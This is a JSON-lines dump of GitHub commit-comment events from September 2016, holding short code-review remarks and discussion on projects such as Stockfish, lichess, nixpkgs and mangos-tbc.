{"id":"4512140659","type":"CommitCommentEvent","actor":{"login":"kurusaki234"},"repo":{"name":"kurusaki234/Testing"},"payload":{"comment":{"id":18890089,"position":null,"line":null,"path":null,"commit_id":"810dd0f35a647ac4d98a9b7495e689225ba040e4","created_at":"2016-09-03T13:08:28Z","updated_at":"2016-09-03T13:08:28Z","body":"Github very hard to use"}},"created_at":"2016-09-03T13:08:28Z"}
{"id":"4512151245","type":"CommitCommentEvent","actor":{"login":"rhiever"},"repo":{"name":"geneura-papers/nowcasting-traffic"},"payload":{"comment":{"id":18890093,"position":null,"line":null,"path":null,"commit_id":"b47073905bad309ea37d269e8e0be44569be3907","created_at":"2016-09-03T13:17:50Z","updated_at":"2016-09-03T13:17:50Z","body":"Cool. How long did you run TPOT for?"}},"created_at":"2016-09-03T13:17:50Z"}
{"id":"4512151734","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18890094,"position":null,"line":null,"path":null,"commit_id":"01eb5b3382970f207b983cbc6a241d7639f12a3d","created_at":"2016-09-03T13:18:16Z","updated_at":"2016-09-03T13:18:16Z","body":"Did #14 and #16"}},"created_at":"2016-09-03T13:18:16Z"}
{"id":"4512152347","type":"CommitCommentEvent","actor":{"login":"rosskevin"},"repo":{"name":"facebook/emitter"},"payload":{"comment":{"id":18890095,"position":null,"line":null,"path":null,"commit_id":"9c2828a8070de58d74aa2895cb582c32ef503121","created_at":"2016-09-03T13:18:50Z","updated_at":"2016-09-03T13:18:50Z","body":"Ugh, I don't think it's valid.  Strange that I've been using this branch and it hasn't complained.  Please change it to `:`"}},"created_at":"2016-09-03T13:18:50Z"}
{"id":"4512152637","type":"CommitCommentEvent","actor":{"login":"nmegill"},"repo":{"name":"metamath/set.mm"},"payload":{"comment":{"id":18890096,"position":null,"line":null,"path":null,"commit_id":"e06049900d795f8b5a0dad481345b6f4d523c0f2","created_at":"2016-09-03T13:19:07Z","updated_at":"2016-09-03T13:19:07Z","body":"On 9/2/16 11:15 PM, Mario Carneiro wrote:\n> This is a shortcoming of |metamath.exe|'s rewrap command, I'm sure\n> (which prefers to double-space between sentences). Chances are these\n> will be reverted in the next official release.\n\nThe algorithm should not put a double space after an initial, and this \nis a bug I'll take care of.  So if it happens again in the short term, \ndon't bother to fix it because it will be fixed eventually.  Of course \nit doesn't affect the web page appearance.\n\nThe double space between sentences is (was) in many style guides for \nmonospaced text (i.e. most typewriters), and it is also the default \nwrapping behavior I've seen in several text editors.  Even vi does it \nwith the \"gq}\" command, correctly recognizing special cases such as \n\"Mr.\" and \"i.e.\" and \"A.\" that should not have double space.\n\nNorm\n"}},"created_at":"2016-09-03T13:19:07Z"}
{"id":"4512152734","type":"CommitCommentEvent","actor":{"login":"patham9"},"repo":{"name":"patham9/narjure"},"payload":{"comment":{"id":18890097,"position":null,"line":null,"path":null,"commit_id":"2091024d6f65c7229b160ff7afe96b5521e7fdd3","created_at":"2016-09-03T13:19:12Z","updated_at":"2016-09-03T13:19:12Z","body":"resolves https://github.com/opennars/opennars2/issues/66"}},"created_at":"2016-09-03T13:19:12Z"}
{"id":"4512153384","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18890098,"position":null,"line":null,"path":null,"commit_id":"c77a9607cd697a988c08c082aff592446545cb62","created_at":"2016-09-03T13:19:42Z","updated_at":"2016-09-03T13:19:42Z","body":"Not sure whether I am 100% happy with it. My main goal was to make the list more uniform and easier to parse visually.\nPlease let me know what you think about it."}},"created_at":"2016-09-03T13:19:42Z"}
{"id":"4512154385","type":"CommitCommentEvent","actor":{"login":"hizzlekizzle"},"repo":{"name":"libretro/slang-shaders"},"payload":{"comment":{"id":18890099,"position":null,"line":null,"path":null,"commit_id":"d1e050686b5c6412b80df759672da5e8b3782fef","created_at":"2016-09-03T13:20:31Z","updated_at":"2016-09-03T13:20:31Z","body":"Awesome! Thanks for the confirmation :)"}},"created_at":"2016-09-03T13:20:31Z"}
{"id":"4512154661","type":"CommitCommentEvent","actor":{"login":"patham9"},"repo":{"name":"patham9/narjure"},"payload":{"comment":{"id":18890100,"position":null,"line":null,"path":null,"commit_id":"090d59bc18368a60202a2516036f71df5676eabb","created_at":"2016-09-03T13:20:46Z","updated_at":"2016-09-03T13:20:46Z","body":"for resolving https://github.com/opennars/opennars2/issues/65"}},"created_at":"2016-09-03T13:20:46Z"}
{"id":"4512155037","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18890101,"position":null,"line":null,"path":null,"commit_id":"2331e218dc88408c5cb2db9a7b5f9ebbed82e2d6","created_at":"2016-09-03T13:21:06Z","updated_at":"2016-09-03T13:21:06Z","body":"\" the starting delta is 175, and after each iteration is decreasing until reaching 60 in the end ...\"\r\n\r\nHow to you compute 175 ?"}},"created_at":"2016-09-03T13:21:06Z"}
{"id":"4512155688","type":"CommitCommentEvent","actor":{"login":"zertrin"},"repo":{"name":"zertrin/duplicity-backup"},"payload":{"comment":{"id":18890102,"position":null,"line":null,"path":null,"commit_id":"73adf5dc99f98c0129d1c12a155187a13e36541a","created_at":"2016-09-03T13:21:37Z","updated_at":"2016-09-03T13:21:37Z","body":"Removed ignore rules concerning SC2166 and SC1090 as of commit 17e40b3c67 😉 "}},"created_at":"2016-09-03T13:21:37Z"}
{"id":"4512156584","type":"CommitCommentEvent","actor":{"login":"patham9"},"repo":{"name":"patham9/narjure"},"payload":{"comment":{"id":18890105,"position":null,"line":null,"path":null,"commit_id":"aa7636a9c0bf0b635d3dcfe5df1279e649d7afe0","created_at":"2016-09-03T13:22:10Z","updated_at":"2016-09-03T13:22:10Z","body":"for resolving https://github.com/opennars/opennars2/issues/65"}},"created_at":"2016-09-03T13:22:10Z"}
{"id":"4512157245","type":"CommitCommentEvent","actor":{"login":"joshiejack"},"repo":{"name":"PenguinSquad/Harvest-Festival"},"payload":{"comment":{"id":18890110,"position":null,"line":null,"path":null,"commit_id":"5b6412a42bb0979166004fcbbf5f960145bb56a1","created_at":"2016-09-03T13:22:35Z","updated_at":"2016-09-03T13:22:35Z","body":"escape_rope not escape_route xD"}},"created_at":"2016-09-03T13:22:35Z"}
{"id":"4512159359","type":"CommitCommentEvent","actor":{"login":"patham9"},"repo":{"name":"patham9/narjure"},"payload":{"comment":{"id":18890113,"position":null,"line":null,"path":null,"commit_id":"290001288dd8263a04bd6ac4bf687b96d7721087","created_at":"2016-09-03T13:24:27Z","updated_at":"2016-09-03T13:24:27Z","body":"for resolving https://github.com/opennars/opennars2/issues/65"}},"created_at":"2016-09-03T13:24:27Z"}
{"id":"4512160179","type":"CommitCommentEvent","actor":{"login":"kinsu"},"repo":{"name":"shafreeck/cetcd"},"payload":{"comment":{"id":18890115,"position":2,"line":316,"path":"cetcd.c","commit_id":"6db806bd18f8ada6bb7fb775a2f1116450d08f36","created_at":"2016-09-03T13:25:02Z","updated_at":"2016-09-03T13:25:02Z","body":"watcher->array_index is int while index in cetcd_del_watcher is size_t.\r\nmaybe index should be defined to avoid overflow"}},"created_at":"2016-09-03T13:25:02Z"}
{"id":"4512160243","type":"CommitCommentEvent","actor":{"login":"patham9"},"repo":{"name":"patham9/narjure"},"payload":{"comment":{"id":18890116,"position":null,"line":null,"path":null,"commit_id":"d4944210fe7e2b3d0b747808a8c396a68c8af67a","created_at":"2016-09-03T13:25:05Z","updated_at":"2016-09-03T13:25:05Z","body":"for resolving https://github.com/opennars/opennars2/issues/65"}},"created_at":"2016-09-03T13:25:05Z"}
{"id":"4512160264","type":"CommitCommentEvent","actor":{"login":"icce-p"},"repo":{"name":"mrpeny/walmagERP"},"payload":{"comment":{"id":18890117,"position":12,"line":12,"path":"src/main/java/hu/walmag/erp/services/Dao.java","commit_id":"21f4e09b835e28bd5c0291faab1ae247905c829a","created_at":"2016-09-03T13:25:07Z","updated_at":"2016-09-03T13:25:07Z","body":"No, just remove. Public access right is the default in interfaces."}},"created_at":"2016-09-03T13:25:07Z"}
{"id":"4512161055","type":"CommitCommentEvent","actor":{"login":"notronik"},"repo":{"name":"notronik/PygmentsKit"},"payload":{"comment":{"id":18890118,"position":null,"line":null,"path":null,"commit_id":"716dba809c90e079b26377d56403b19d386ea13b","created_at":"2016-09-03T13:25:52Z","updated_at":"2016-09-03T13:25:52Z","body":"Compatibility* "}},"created_at":"2016-09-03T13:25:52Z"}
{"id":"4512161886","type":"CommitCommentEvent","actor":{"login":"patham9"},"repo":{"name":"patham9/narjure"},"payload":{"comment":{"id":18890120,"position":null,"line":null,"path":null,"commit_id":"17209a2537d551ce1bda3597610b562fe539e9a7","created_at":"2016-09-03T13:26:33Z","updated_at":"2016-09-03T13:26:33Z","body":"for resolving https://github.com/opennars/opennars2/issues/65"}},"created_at":"2016-09-03T13:26:33Z"}
{"id":"4512162424","type":"CommitCommentEvent","actor":{"login":"icce-p"},"repo":{"name":"mrpeny/walmagERP"},"payload":{"comment":{"id":18890121,"position":11,"line":11,"path":"src/main/java/hu/walmag/erp/services/Dao.java","commit_id":"21f4e09b835e28bd5c0291faab1ae247905c829a","created_at":"2016-09-03T13:27:00Z","updated_at":"2016-09-03T13:27:00Z","body":"yes"}},"created_at":"2016-09-03T13:27:00Z"}
{"id":"4512164287","type":"CommitCommentEvent","actor":{"login":"xiaofeixia16"},"repo":{"name":"xiaofeixia16/backbone"},"payload":{"comment":{"id":18890123,"position":null,"line":null,"path":null,"commit_id":"9bbd40258ad7744a3c0fa7af252791693488bc08","created_at":"2016-09-03T13:28:36Z","updated_at":"2016-09-03T13:28:36Z","body":"ok,very good"}},"created_at":"2016-09-03T13:28:36Z"}
{"id":"4512172640","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18890126,"position":null,"line":null,"path":null,"commit_id":"2d47a11f2530e155b6360f2ffe818b2a86b67f2f","created_at":"2016-09-03T13:35:13Z","updated_at":"2016-09-03T13:35:13Z","body":"Cool code :-)"}},"created_at":"2016-09-03T13:35:13Z"}
{"id":"4512174081","type":"CommitCommentEvent","actor":{"login":"abbradar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18890130,"position":null,"line":null,"path":null,"commit_id":"fc0b40328d4b1b284d9e00ba222687626d93cbef","created_at":"2016-09-03T13:36:27Z","updated_at":"2016-09-03T13:36:27Z","body":"Oh, that was my mistake. It was `mesa_noglu` in unstable and when I rebased I haven't noticed that it became `_glu`."}},"created_at":"2016-09-03T13:36:27Z"}
{"id":"4512174859","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"ornicar/lila"},"payload":{"comment":{"id":18890132,"position":4,"line":89,"path":"modules/common/src/main/Steroids.scala","commit_id":"5c24d763c6d0fc0a08bfd6564fb0073e6466bec2","created_at":"2016-09-03T13:37:04Z","updated_at":"2016-09-03T13:37:04Z","body":"right ... as itself in a trait ... "}},"created_at":"2016-09-03T13:37:04Z"}
{"id":"4512176976","type":"CommitCommentEvent","actor":{"login":"hogashi"},"repo":{"name":"hogashi/twitterOpenOriginalImage"},"payload":{"comment":{"id":18890134,"position":null,"line":null,"path":null,"commit_id":"ea03e9fe2da6c7a95d2309933a21f3163e34fc5d","created_at":"2016-09-03T13:38:44Z","updated_at":"2016-09-03T13:38:44Z","body":"ref: #1 "}},"created_at":"2016-09-03T13:38:44Z"}
{"id":"4512177402","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18890135,"position":null,"line":null,"path":null,"commit_id":"456eacf7fc16a3e8a728c384c95b2bf7feb3adaa","created_at":"2016-09-03T13:39:03Z","updated_at":"2016-09-03T13:39:03Z","body":"Making modpacks this morning. Gonna leave active diplomacy off for now. Will turn it on to debug when we got the other issue sorted. Don't trust that code completely yet. "}},"created_at":"2016-09-03T13:39:03Z"}
{"id":"4512177629","type":"CommitCommentEvent","actor":{"login":"hogashi"},"repo":{"name":"hogashi/twitterOpenOriginalImage"},"payload":{"comment":{"id":18890137,"position":null,"line":null,"path":null,"commit_id":"e10dad14791bff3f103c0c669df34171738c8e44","created_at":"2016-09-03T13:39:16Z","updated_at":"2016-09-03T13:39:16Z","body":"ref: #2 "}},"created_at":"2016-09-03T13:39:16Z"}
{"id":"4512178003","type":"CommitCommentEvent","actor":{"login":"hogashi"},"repo":{"name":"hogashi/twitterOpenOriginalImage"},"payload":{"comment":{"id":18890138,"position":null,"line":null,"path":null,"commit_id":"e5bb0f3e05637437a1207673bddf13251f1121a6","created_at":"2016-09-03T13:39:32Z","updated_at":"2016-09-03T13:39:32Z","body":"ref: #3 "}},"created_at":"2016-09-03T13:39:32Z"}
{"id":"4512178156","type":"CommitCommentEvent","actor":{"login":"cadaver"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18890139,"position":null,"line":null,"path":null,"commit_id":"000b1af6d733e6fca6854e0214b06455eb37ea89","created_at":"2016-09-03T13:39:39Z","updated_at":"2016-09-03T13:39:39Z","body":"It's correct for the way it's implemented, which is that pending obstacle updates are only made during scene update, unless the queue overflows."}},"created_at":"2016-09-03T13:39:39Z"}
{"id":"4512179927","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":18890140,"position":7,"line":148,"path":"vis/tests/test_new_ngram.py","commit_id":"f603f28550324fa42e15c5589a920b480934777b","created_at":"2016-09-03T13:41:02Z","updated_at":"2016-09-03T13:41:02Z","body":"In these cases it's probably better to check the error with `assertRaises`, rather than just checking that the error message string is the same.\r\n\r\nhttps://docs.python.org/3.5/library/unittest.html#unittest.TestCase.assertRaises\r\n\r\n\r\nShould be something like:\r\n\r\n```\r\nself.assertRaises(RunTimeWarning, new_ngram.NewNGramIndexer, (VERT_DF, HORIZ_DF), setts)\r\n```\r\n\r\n"}},"created_at":"2016-09-03T13:41:02Z"}
{"id":"4512181204","type":"CommitCommentEvent","actor":{"login":"McPhelpsius"},"repo":{"name":"fabean/100-days-of-code"},"payload":{"comment":{"id":18890141,"position":null,"line":null,"path":null,"commit_id":"66040b7bc0f56e87d05d172f086cdb92221f04b8","created_at":"2016-09-03T13:42:03Z","updated_at":"2016-09-03T13:42:03Z","body":"What's the issue with livereload?"}},"created_at":"2016-09-03T13:42:03Z"}
{"id":"4512181941","type":"CommitCommentEvent","actor":{"login":"joshschmelzle"},"repo":{"name":"joshschmelzle/lazywriter"},"payload":{"comment":{"id":18890142,"position":null,"line":null,"path":null,"commit_id":"c7e4b335c96b99463cac45946328aa47e7270130","created_at":"2016-09-03T13:42:38Z","updated_at":"2016-09-03T13:42:38Z","body":"resolves #1 "}},"created_at":"2016-09-03T13:42:38Z"}
{"id":"4512182044","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":18890143,"position":7,"line":148,"path":"vis/tests/test_new_ngram.py","commit_id":"f603f28550324fa42e15c5589a920b480934777b","created_at":"2016-09-03T13:42:43Z","updated_at":"2016-09-03T13:42:43Z","body":"Whoops! Just noticed that you're already doing this just above!\r\n\r\nI don't think there's much point in checking that the error message string is the same, then, unless it changes based on the values that are passed (it doesn't look like it does). "}},"created_at":"2016-09-03T13:42:43Z"}
{"id":"4512183263","type":"CommitCommentEvent","actor":{"login":"mriveralee"},"repo":{"name":"ariveralee/ariveralee.github.io"},"payload":{"comment":{"id":18890144,"position":null,"line":null,"path":null,"commit_id":"984a0a26d38eeaecca8be2b04b072f7c64bc96f6","created_at":"2016-09-03T13:43:46Z","updated_at":"2016-09-03T13:43:46Z","body":"Lolz - that commit message"}},"created_at":"2016-09-03T13:43:46Z"}
{"id":"4512183520","type":"CommitCommentEvent","actor":{"login":"bjornregnell"},"repo":{"name":"lunduniversity/introprog"},"payload":{"comment":{"id":18890145,"position":null,"line":null,"path":null,"commit_id":"3c2c121d77f743b3389a1c73d9f33e1c6c4c80f9","created_at":"2016-09-03T13:43:57Z","updated_at":"2016-09-03T13:43:57Z","body":"@perssonsimon1 Thanks for this PR #182!! I'd be happy to include you in the list of contributors if you make a PR on the file contributors.tex "}},"created_at":"2016-09-03T13:43:57Z"}
{"id":"4512183557","type":"CommitCommentEvent","actor":{"login":"valo"},"repo":{"name":"valo/maycamp_arena"},"payload":{"comment":{"id":18890146,"position":null,"line":null,"path":null,"commit_id":"075af31c4257f957c8a6d0703a4d6ad4f67b26a5","created_at":"2016-09-03T13:43:59Z","updated_at":"2016-09-03T13:43:59Z","body":"It is, but the docker version used for the grader is a bit old. I am\nworking on a setup which will use docker for deployment of all services and\nwill fix the versions when that is ready.\nOn сб, 3.09.2016 г. at 16:04 Vasil Sarafov <notifications@github.com> wrote:\n\n> Isn't --cpuset-cpus the right parameter though? That's why I proposed to\n> change it from --cpuset as described here\n> <https://github.com/valo/maycamp_arena/pull/123>.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/valo/maycamp_arena/commit/075af31c4257f957c8a6d0703a4d6ad4f67b26a5#commitcomment-18890082>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAC6F065CatZjR5DuREmw4JVAsxFjYx2ks5qmXBtgaJpZM4J0TKA>\n> .\n>\n"}},"created_at":"2016-09-03T13:43:59Z"}
{"id":"4512183651","type":"CommitCommentEvent","actor":{"login":"takkaria"},"repo":{"name":"t4nk074/angband"},"payload":{"comment":{"id":18890147,"position":null,"line":null,"path":null,"commit_id":"bc384983ed6ed1fb2c23cc2b5b74fb643520e5b1","created_at":"2016-09-03T13:44:04Z","updated_at":"2016-09-03T13:44:04Z","body":"To me it looks like the optimal behaviour would be to have the terms resize to accommodate the text, something that should be pretty possible with textblock's line calculator."}},"created_at":"2016-09-03T13:44:04Z"}
{"id":"4512184172","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18890148,"position":null,"line":null,"path":null,"commit_id":"ad3c4059cb7db047d9937cd368d22170f0152bc0","created_at":"2016-09-03T13:44:25Z","updated_at":"2016-09-03T13:44:25Z","body":"++"}},"created_at":"2016-09-03T13:44:25Z"}
{"id":"4512184495","type":"CommitCommentEvent","actor":{"login":"antma"},"repo":{"name":"ornicar/lila"},"payload":{"comment":{"id":18890149,"position":null,"line":null,"path":null,"commit_id":"97e53c67c9bb1ee931d0e28bf120c1ef3aae3aa8","created_at":"2016-09-03T13:44:42Z","updated_at":"2016-09-03T13:44:42Z","body":"Since b.length <= pairingGroupSize (according grouped specification)\r\n`b take pairingGroupSize`\r\ncould be replaced by\r\n`b` "}},"created_at":"2016-09-03T13:44:42Z"}
{"id":"4512191649","type":"CommitCommentEvent","actor":{"login":"CatherineZhuang"},"repo":{"name":"RSLi/SkillReal"},"payload":{"comment":{"id":18890150,"position":null,"line":null,"path":null,"commit_id":"541328bef0d3f7311de5d210f973d57b0a0c77ba","created_at":"2016-09-03T13:50:21Z","updated_at":"2016-09-03T13:50:21Z","body":"+Collaborator: CatherineZhuang"}},"created_at":"2016-09-03T13:50:21Z"}
{"id":"4512192079","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18890151,"position":null,"line":null,"path":null,"commit_id":"1bd270ddd7547b91b763600cae0e10afbdcb61d0","created_at":"2016-09-03T13:50:45Z","updated_at":"2016-09-03T13:50:45Z","body":"@Stefano , Rocky:\r\n\r\nCan you please explain what is wrong with the test?\r\nI put base branch and test branch the same, and I put base bench and test bench the same.\r\n\r\nSo where is the problem? what should I do to fix it?"}},"created_at":"2016-09-03T13:50:45Z"}
{"id":"4512193350","type":"CommitCommentEvent","actor":{"login":"ZevEisenberg"},"repo":{"name":"Raizlabs/FinePrint"},"payload":{"comment":{"id":18890152,"position":7,"line":19,"path":"FinePrint/NSAttributedString+BonMot.swift","commit_id":"53b0179c25f79411001bba62d9582a3ebbff770b","created_at":"2016-09-03T13:51:53Z","updated_at":"2016-09-03T13:51:53Z","body":"Why not just have it take an image instead? Images can come from all over, not just names, like from the network or Xcode 8 literals. You already have that initializer - I don't see much use for this one."}},"created_at":"2016-09-03T13:51:53Z"}
{"id":"4512193383","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18890153,"position":null,"line":null,"path":null,"commit_id":"2331e218dc88408c5cb2db9a7b5f9ebbed82e2d6","created_at":"2016-09-03T13:51:55Z","updated_at":"2016-09-03T13:51:55Z","body":"param: spaceThreshold, best: 12220.74, start: 12222.00, min: 0.00, max: 24444.00, c 174.968275, a 6833.728000\r\n\r\nI always thought that the tuning would start with c, in this case 175. I may be wrong, though."}},"created_at":"2016-09-03T13:51:55Z"}
{"id":"4512193514","type":"CommitCommentEvent","actor":{"login":"hacker102"},"repo":{"name":"hacker102/DS2"},"payload":{"comment":{"id":18890154,"position":null,"line":null,"path":null,"commit_id":"d79412fbbba6aad962f9e296587fa9c300036350","created_at":"2016-09-03T13:52:01Z","updated_at":"2016-09-03T13:52:01Z","body":"kk"}},"created_at":"2016-09-03T13:52:01Z"}
{"id":"4512193529","type":"CommitCommentEvent","actor":{"login":"cim1393"},"repo":{"name":"kristw/d3kit-timeline"},"payload":{"comment":{"id":18890155,"position":null,"line":null,"path":null,"commit_id":"85b248d64b846cc40dfc388ce9690541a45e6996","created_at":"2016-09-03T13:52:02Z","updated_at":"2016-09-03T13:52:02Z","body":"after I copy lots of files to the specified path,I got this:\r\nTypeError: Cannot read property 'scale' of undefined\r\nat d3kit-timeline.min.js:1\r\n    at Object.context.execCb (require.2.1.10.js:2200)\r\n    at Object.Module.check (require.2.1.10.js:1208)\r\n    at Object.<anonymous> (require.2.1.10.js:1461)\r\n    at require.2.1.10.js:398\r\n    at require.2.1.10.js:1504\r\n    at each (require.2.1.10.js:323)\r\n    at Object.Module.emit (require.2.1.10.js:1503)\r\n    at Object.Module.check (require.2.1.10.js:1264)\r\n    at Object.<anonymous> (require.2.1.10.js:1461)"}},"created_at":"2016-09-03T13:52:02Z"}
{"id":"4512193848","type":"CommitCommentEvent","actor":{"login":"fabean"},"repo":{"name":"fabean/100-days-of-code"},"payload":{"comment":{"id":18890157,"position":null,"line":null,"path":null,"commit_id":"66040b7bc0f56e87d05d172f086cdb92221f04b8","created_at":"2016-09-03T13:52:17Z","updated_at":"2016-09-03T13:52:17Z","body":"Pretty sure it's that it's watching for html files and I'm only editing js files. Should be a super quick fix."}},"created_at":"2016-09-03T13:52:17Z"}
{"id":"4512194052","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18890158,"position":209,"line":3808,"path":"src/game/SpellEffects.cpp","commit_id":"92e53ef31316d9263fe639f9e5116cbecd3ac460","created_at":"2016-09-03T13:52:28Z","updated_at":"2016-09-03T13:52:28Z","body":"this check is added because not all creature minions before used guardianAI, and so many of them would not protect their owner/master , so instead of adding it to every single AI a summon could have we added it here back with pet patch 1.1 or 1.2, don't remember exactly.\r\n\r\nNow that all creature minions and player guardians use guardian AI which natively acts to protect it's owner then this call should no longer be needed and can be removed (we may need to verify but I'm 90% sure)"}},"created_at":"2016-09-03T13:52:28Z"}
{"id":"4512194929","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18890159,"position":44,"line":36,"path":"index.js","commit_id":"257467cfc3b6088924ed12fe4c80c3855a661e1e","created_at":"2016-09-03T13:53:10Z","updated_at":"2016-09-03T13:53:10Z","body":"This transform should never `require` browserify by itself. Why would you want this?"}},"created_at":"2016-09-03T13:53:10Z"}
{"id":"4512197767","type":"CommitCommentEvent","actor":{"login":"AleksCore"},"repo":{"name":"JarnoVgr/Mr.Green-MTA-Resources"},"payload":{"comment":{"id":18890161,"position":null,"line":null,"path":null,"commit_id":"488be3dd22db14de273d0c374bd4accaac38b311","created_at":"2016-09-03T13:55:33Z","updated_at":"2016-09-03T13:55:33Z","body":"@JarnoVgr do u know how to avoid this?"}},"created_at":"2016-09-03T13:55:33Z"}
{"id":"4512198670","type":"CommitCommentEvent","actor":{"login":"fabean"},"repo":{"name":"fabean/100-days-of-code"},"payload":{"comment":{"id":18890164,"position":null,"line":null,"path":null,"commit_id":"66040b7bc0f56e87d05d172f086cdb92221f04b8","created_at":"2016-09-03T13:56:19Z","updated_at":"2016-09-03T13:56:19Z","body":"Fixed with this commit: https://github.com/fabean/buffhammer/commit/db9cc550cafb2d9fd22b213f2c9e2cb0ee12956b"}},"created_at":"2016-09-03T13:56:19Z"}
{"id":"4512198923","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18890165,"position":521,"line":4278,"path":"src/game/SpellEffects.cpp","commit_id":"92e53ef31316d9263fe639f9e5116cbecd3ac460","created_at":"2016-09-03T13:56:31Z","updated_at":"2016-09-03T13:56:31Z","body":"this diff is perhaps a bit pointless. It may be due to some of my pet work not being exactly synced, though. If this does so they are synced then let's leave this change here at least for now."}},"created_at":"2016-09-03T13:56:31Z"}
{"id":"4512199318","type":"CommitCommentEvent","actor":{"login":"pisceslj"},"repo":{"name":"pisceslj/Algorithms_DataStructures"},"payload":{"comment":{"id":18890166,"position":null,"line":null,"path":null,"commit_id":"d97872f6a61e332f0a07e2475845e8896fe1bc90","created_at":"2016-09-03T13:56:51Z","updated_at":"2016-09-03T13:56:51Z","body":"good"}},"created_at":"2016-09-03T13:56:51Z"}
{"id":"4512199351","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18890167,"position":8,"line":6,"path":"index.js","commit_id":"257467cfc3b6088924ed12fe4c80c3855a661e1e","created_at":"2016-09-03T13:56:53Z","updated_at":"2016-09-03T13:56:53Z","body":"I'd rather not want a default extension to be inlined. I want browserify transforms to be as predictable & intuitive as possible. But that's a matter of taste."}},"created_at":"2016-09-03T13:56:53Z"}
{"id":"4512201339","type":"CommitCommentEvent","actor":{"login":"tanishamajumder"},"repo":{"name":"1nF0rmed/cproj01"},"payload":{"comment":{"id":18890169,"position":null,"line":null,"path":null,"commit_id":"4f50371db49fa3585bdb7e2a078eaccdd922fd53","created_at":"2016-09-03T13:58:34Z","updated_at":"2016-09-03T13:58:34Z","body":"mny thngs r cnfusng.........................."}},"created_at":"2016-09-03T13:58:34Z"}
{"id":"4512201799","type":"CommitCommentEvent","actor":{"login":"FireNeslo"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18890170,"position":44,"line":36,"path":"index.js","commit_id":"257467cfc3b6088924ed12fe4c80c3855a661e1e","created_at":"2016-09-03T13:58:58Z","updated_at":"2016-09-03T13:58:58Z","body":"Usually i would agree with you, but not for this use case.\r\n\r\nlets say you want to externalize some heavy function to a webworker. \r\nBut don't want to have an external file lying around. And inside the webworker you want to make use of the transforms you are using for the functions inside the webworker as well. a lott less of them perhaps, but keeping the same style. Then you can use this transform for bundling your file as a blob an run it using a Blob URL.\r\n\r\nBut maybe a better approach would be allowing you to provide the bundler yourself? That way we don't need an explisit dependency."}},"created_at":"2016-09-03T13:58:58Z"}
{"id":"4512202491","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":18890171,"position":null,"line":null,"path":null,"commit_id":"b97f4c3133d4df4a78e276d2ca3fcddc808de260","created_at":"2016-09-03T13:59:33Z","updated_at":"2016-09-03T13:59:33Z","body":"Strange but true, I don't know when you'd ever want or get a signed chunk radius"}},"created_at":"2016-09-03T13:59:33Z"}
{"id":"4512204209","type":"CommitCommentEvent","actor":{"login":"ornicar"},"repo":{"name":"ornicar/lila"},"payload":{"comment":{"id":18890174,"position":null,"line":null,"path":null,"commit_id":"97e53c67c9bb1ee931d0e28bf120c1ef3aae3aa8","created_at":"2016-09-03T14:00:39Z","updated_at":"2016-09-03T14:00:39Z","body":"that, sir, is correct!\r\n\r\nWould you like to join lichess developer team chat on slack? Send me your email at https://en.lichess.org/inbox/new?user=thibault and I'll invite you."}},"created_at":"2016-09-03T14:00:39Z"}
{"id":"4512204581","type":"CommitCommentEvent","actor":{"login":"gorhill"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":18890175,"position":null,"line":null,"path":null,"commit_id":"f6cdb14d2fcf0296851f654733b8b672c5db8973","created_at":"2016-09-03T14:00:54Z","updated_at":"2016-09-03T14:00:54Z","body":"@mapx- re. <https://adblockplus.org/forum/viewtopic.php?f=1&t=48346#p157945>: I think the `!important` keyword need to be removed for that `-abp-properties` filter to work."}},"created_at":"2016-09-03T14:00:54Z"}
{"id":"4512205147","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18890177,"position":424,"line":4180,"path":"src/game/SpellEffects.cpp","commit_id":"92e53ef31316d9263fe639f9e5116cbecd3ac460","created_at":"2016-09-03T14:01:17Z","updated_at":"2016-09-03T14:01:17Z","body":"Did you completely remove this check for engineering skill level for engineering trinket guardians?\r\nBecause we kind of need that for... yeah... engineering trinkets guardians..."}},"created_at":"2016-09-03T14:01:17Z"}
